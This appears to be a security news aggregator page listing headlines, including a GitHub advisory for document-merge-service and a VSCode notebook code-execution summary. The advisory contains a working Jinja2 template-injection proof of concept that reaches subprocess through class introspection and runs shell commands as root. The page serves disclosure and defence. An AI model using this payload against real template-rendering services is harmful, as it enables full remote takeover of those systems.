Security
Headlines
HeadlinesLatestCVEs

Tag

#web

Fortinet Plans to Acquire Lacework

Lacework has been looking for a buyer for some time. The deal gives Fortinet a boost in the cloud security space.

DARKReading
Open in Source
#web#mac#intel#auth
Canada & UK Partner in Joint 23andMe Data Breach Investigation

The two jurisdictions will work together to investigate the credential-stuffing attack that put the personal data of millions at risk.

GHSA-v5gf-r78h-55q6: document-merge-service vulnerable to Remote Code Execution via Server-Side Template Injection

### Impact _What kind of vulnerability is it? Who is impacted?_ RCE via SSTI, as root, full takeover. ### Patches _Has the problem been patched? What versions should users upgrade to?_ It has not been patched. ### References _Are there any links users can visit to find out more?_ - https://book.hacktricks.xyz/pentesting-web/ssti-server-side-template-injection/jinja2-ssti ### POC Add the following to a document, upload and render it: ```jinja2 {% if PLACEHOLDER.__class__.__mro__[1].__subclasses__()[202] %} ls -a: {{ PLACEHOLDER.__class__.__mro__[1].__subclasses__()[202]("ls -a", shell=True, stdout=-1).communicate()[0].strip() }} whoami: {{ PLACEHOLDER.__class__.__mro__[1].__subclasses__()[202]("whoami", shell=True, stdout=-1).communicate()[0].strip() }} uname -a: {{ PLACEHOLDER.__class__.__mro__[1].__subclasses__()[202]("uname -a", shell=True, stdout=-1).communicate()[0].strip() }} {% endif %} ``` The index might be different, so to debug this first render a template with `...

US Leaders Dodge Questions About Israel’s Influence Campaign

Democratic leader Hakeem Jeffries has joined US intelligence officials in ignoring repeated inquiries about Israel’s “malign” efforts to covertly influence US voters.

Kernel Live Patch Security Notice LSN-0104-1

It was discovered that the ATA over Ethernet (AoE) driver in the Linux kernel contained a race condition, leading to a use-after-free vulnerability. An attacker could use this to cause a denial of service or possibly execute arbitrary code. It was discovered that a race condition existed in the AppleTalk networking subsystem of the Linux kernel, leading to a use-after-free vulnerability. A local attacker could use this to cause a denial of service (system crash) or possibly execute arbitrary code. Various other issues were also addressed.

VSCode ipynb Remote Code Execution

VSCode when opening a Jupyter notebook (.ipynb) file bypasses the trust model. On versions v1.4.0 through v1.71.1, its possible for the Jupyter notebook to embed HTML and javascript, which can then open new terminal windows within VSCode. Each of these new windows can then execute arbitrary code at startup. During testing, the first open of the Jupyter notebook resulted in pop-ups displaying errors of unable to find the payload exe file. The second attempt at opening the Jupyter notebook would result in successful execution. Successfully tested against VSCode 1.70.2 on Windows 10.

Red Hat Security Advisory 2024-3783-03

Red Hat Security Advisory 2024-3783-03 - An update for firefox is now available for Red Hat Enterprise Linux 8.10. Issues addressed include bypass and use-after-free vulnerabilities.